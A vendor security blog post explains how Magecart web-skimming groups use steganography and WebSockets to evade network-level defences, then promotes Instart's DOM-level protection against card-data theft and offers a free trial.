Home » Security Bloggers Network » Stopping data loss is getting harder as Magecart attackers employ new techniques

Stopping data loss is getting harder as Magecart attackers employ new techniques

Web skimming attacks, such as those carried out by Magecart, made headlines in 2019 as major online businesses publicly disclosed attacks. While web skimming attacks aim to steal all types of sensitive personal data, such as social security numbers, email addresses, and passwords, Magecart attackers almost exclusively target websites with the aim of stealing credit card numbers. 

New year, new attack techniques

Like any good cybercriminals, Magecart groups are evolving and adapting their web skimmers in order to evade security solutions. A recent article highlighted two new techniques disclosed by @affablekraut and being employed in web skimming attacks:

• Steganography – Attackers conceal malicious JavaScript in another type of file, such as an image file. Most crawlers or scanners tend to concentrate on HTML or JavaScript files and ignore media files for faster processing.
• WebSockets – Attackers conceal a connection to their own server over a WebSocket that then sends malicious skimming code to exfiltrate data from a web page. While WebSockets provide real-time transfer, the advantage they offer to attackers  is a more covert way of exchanging data rather than HTTP protocol, which is often more closely monitored for exfiltration. 

These new creative techniques simply underline the fact that attackers are growing smart to the way that most web security solutions are identifying online skimming attacks. In most cases, web skimming protection solutions monitor for specific attack markers, including:

• Malicious JavaScript in the Document Object Model (DOM) 
• Skimming code from third-party resources
• Unauthorized exfiltration of data using HTTP GET or HTTP POST requests

Why data-level protection in the browser is key to preventing web skimming attacksRelated Product information

Network control will not always prevent new types of web skimming

One of the most common types of protection against web skimming attacks is utilizing network control to prevent attacks. In other words, they provide the ability to monitor and control network traffic from a web application to any third-party location, like a malicious host’s server, using gateways that are then used to configure whitelisted or blacklisted network locations. 

This type of protection is effective for stopping a web skimmer in a Magecart attack from sending a credit card number to a remote server. However, there is a caveat: This approach assumes that an attacker is actively sending stolen data to a server using a method that is blocked by the web security solution being used on the website. 

For example, if a web skimming protection solution automatically blocks XMLhttpRequest (the most common code method used by JavaScript to request or send data), then it would be helpful in blocking some of the most common skimming attacks like those that hit Macy’s and British Airways. However, as the above new techniques illustrate — web skimming attackers are finding new ways to circumvent this type of protection by manipulating the DOM to use image loading, iFrame URLs, or WebSockets to deliver web skimmers and exfiltrate valuable customer data. 

DOM control is the best way to prevent data exfiltration

The reality is that JavaScript was never really designed to be used like it is today and while the technology has evolved dramatically, it is impossible to implement strict, overarching, security layers without breaking millions of websites. All web skimming protection technologies bring some form of security to the browser, but the further the layer is from the root document (the web page), the easier it is for attackers to circumvent that protection.

Instart Web Skimming Protection differs from network-level protection, such as the solutions offered by Ensighten and Tala Security, by preventing access to the sensitive data itself — at the DOM. For example, if a malicious script attempted to read the field where a credit card number is entered, the read request is blocked, regardless of any network method used. Essentially, the script can not read the field, so there will be no data to send back to the attackers. By controlling access at the document level directly in the browser, it doesn’t matter how attackers adapt their malware to transmit their stolen data — the script is unable to access the data in the first place.

Learn more about Instart’s data-level protection against web skimming attacksGet a FREE 30-day trial